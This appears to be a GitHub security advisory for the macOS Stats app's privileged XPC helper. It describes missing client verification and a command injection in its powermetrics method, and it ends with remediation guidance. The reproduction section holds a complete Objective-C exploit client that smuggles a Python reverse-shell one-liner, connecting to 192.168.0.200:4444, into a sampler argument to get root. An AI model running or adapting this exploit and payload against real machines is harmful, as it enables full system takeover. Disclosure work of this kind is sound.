Uh oh!
There was an error while loading.Please reload this page.
- Notifications
You must be signed in to change notification settings - Fork1k
Local Privilege Escalation via Exposed XPC Method Due to Client Verification Failure
Package
Affected versions
Patched versions
Description
Local Privilege Escalation via Exposed XPC Method Due to Client Verification Failure
Description
The Stats application is vulnerable to a local privilege escalation due to the insecure implementation of its XPC service. The application registers a Mach service under the nameeu.exelban.Stats.SMC.Helper. The associated binary, eu.exelban.Stats.SMC.Helper, is a privileged helper tool designed to execute actions requiring elevated privileges on behalf of the client, such as setting fan modes, adjusting fan speeds, and executing thepowermetrics command.
The root cause of this vulnerability lies in theshouldAcceptNewConnection method, which unconditionally returns YES (or true), allowing any XPC client to connect to the service without any form of verification. As a result, unauthorized clients can establish a connection to the Mach service and invoke methods exposed by the HelperTool interface.
func listener(_ listener:NSXPCListener, shouldAcceptNewConnection connection:NSXPCConnection)->Bool{ connection.exportedInterface=NSXPCInterface(with:HelperProtocol.self) connection.exportedObject=self connection.invalidationHandler={iflet connectionIndex=self.connections.firstIndex(of: connection){self.connections.remove(at: connectionIndex)}ifself.connections.isEmpty{self.shouldQuit=true}}self.connections.append(connection) connection.resume()returntrue}
Among the exposed methods,setFanMode andsetFanSpeed can destabilize the user's device and even pose physical risks, such as overheating or system instability.
func setFanMode(id:Int, mode:Int, completion:@escaping(String?)->Void)func setFanSpeed(id:Int, value:Int, completion:@escaping(String?)->Void)
Thepowermetrics method is particularly dangerous as it is vulnerable to acommand injection vulnerability, allowing the execution of arbitrary code with root privileges. This effectively grants attackers full control over the system.
func powermetrics(_ samplers:[String], completion:@escaping(String?)->Void){letresult=syncShell("powermetrics -n 1 -s\(samplers.joined(separator:",")) --sample-rate 1000")iflet error= result.error, !error.isEmpty{NSLog("error call powermetrics:\(error)")completion(nil)return}completion(result.output)}publicfunc syncShell(_ args:String)->(output:String?, error:String?){lettask=Process() task.launchPath="/bin/sh" task.arguments=["-c", args]letoutputPipe=Pipe()leterrorPipe=Pipe()defer{ outputPipe.fileHandleForReading.closeFile() errorPipe.fileHandleForReading.closeFile()} task.standardOutput= outputPipe task.standardError= errorPipedo{try task.run()}catchlet err{return(nil,"syncShell:\(err.localizedDescription)")}letoutputData= outputPipe.fileHandleForReading.readDataToEndOfFile()leterrorData= errorPipe.fileHandleForReading.readDataToEndOfFile()letoutput=String(data: outputData, encoding:.utf8)leterror=String(data: errorData, encoding:.utf8)return(output, error)}
Impact
An attacker can exploit this vulnerability to modify the hardware settings of the user’s device and execute arbitrary code with root privileges.
Reproduction
To avoid potential hardware damage, this demonstration focuses solely on the attack path to obtain root privileges without altering the device's hardware settings.
Step 1: Below is a custom XPC client (exploit) to demonstrate the issue. Feel free to change the value ofmaliciousSamplers to include different command payloads:
#import <Foundation/Foundation.h>@protocolHelperProtocol- (void)versionWithCompletion:(void (^)(NSString* _Nonnull))completion;- (void)setSMCPath:(NSString*_Nonnull)path;- (void)setFanModeWithId:(NSInteger)idmode:(NSInteger)modecompletion:(void (^)(NSString*_Nullable))completion;- (void)setFanSpeedWithId:(NSInteger)idvalue:(NSInteger)valuecompletion:(void (^)(NSString*_Nullable))completion;- (void)powermetrics:(NSArray<NSString*>*_Nonnull)samplerscompletion:(void (^)(NSString*_Nullable))completion;- (void)uninstall;@endintmain(){NSString*service_name= @"eu.exelban.Stats.SMC.Helper";NSXPCConnection*connection= [[NSXPCConnectionalloc]initWithMachServiceName:service_nameoptions:0x1000];NSXPCInterface*interface= [NSXPCInterfaceinterfaceWithProtocol:@protocol(HelperProtocol)]; [connectionsetRemoteObjectInterface:interface]; [connectionresume];idobj= [connectionremoteObjectProxyWithErrorHandler:^(NSError*error) {NSLog(@"[-] Something went wrong");NSLog(@"[-] Error: %@",error); } ];NSLog(@"Objection: %@",obj);NSLog(@"Connection: %@",connection);NSArray<NSString*>*maliciousSamplers= @[@"cpu_power", @"gpu_power; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.200\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';"]; [objpowermetrics:maliciousSamplerscompletion:^(NSString*_Nullableresult) {if (result) {NSLog(@"Result: %@",result); }else {NSLog(@"An error occurred."); } }];NSLog(@"Exploitation completed\n");}
Step 2: To simulate an attacker’s Command and Control (C2) server, set up a netcat listener on another host.
Step 3: Compile and execute the exploit, and we will quickly gain a root reverse shell.
Recommendation
Implement robust client verification mechanisms, includingcode signing checks andaudit token (PID is not secure) verification. A good example can be found inhttps://github.com/objective-see/BlockBlock/blob/aa83b7326a4823e78cb2f2d214d39bc8af26ed79/Daemon/Daemon/XPCListener.m#L147. Additionally, ensure that thehardened runtime is enabled and restrict sensitive entitlements, such ascom.apple.security.cs.disable-library-validation,com.apple.security.cs.allow-dyld-environment-variables, andcom.apple.private.security.clear-library-validation, among others.
To mitigate command injection vulnerabilities, it is crucial to properly validate and escape command arguments. Below is an example implementation for the powermetrics method:
func powermetrics(_ samplers:[String], completion:@escaping(String?)->Void){ // Define a list of allowed samplersletallowedSamplers=["cpu","gpu","memory","thermal"] // Add more as needed // Validate samplers against the allowed listletvalidSamplers= samplers.filter{ allowedSamplers.contains($0)}if validSamplers.isEmpty{NSLog("Invalid samplers provided.")completion(nil)return} // Construct the command with validated inputsletcommand="powermetrics -n 1 -s\(validSamplers.joined(separator:",")) --sample-rate 1000" // Execute the command (ensure `syncShell` is implemented securely)letresult=syncShell(command)iflet error= result.error, !error.isEmpty{NSLog("Error executing powermetrics:\(error)")completion(nil)return}completion(result.output)}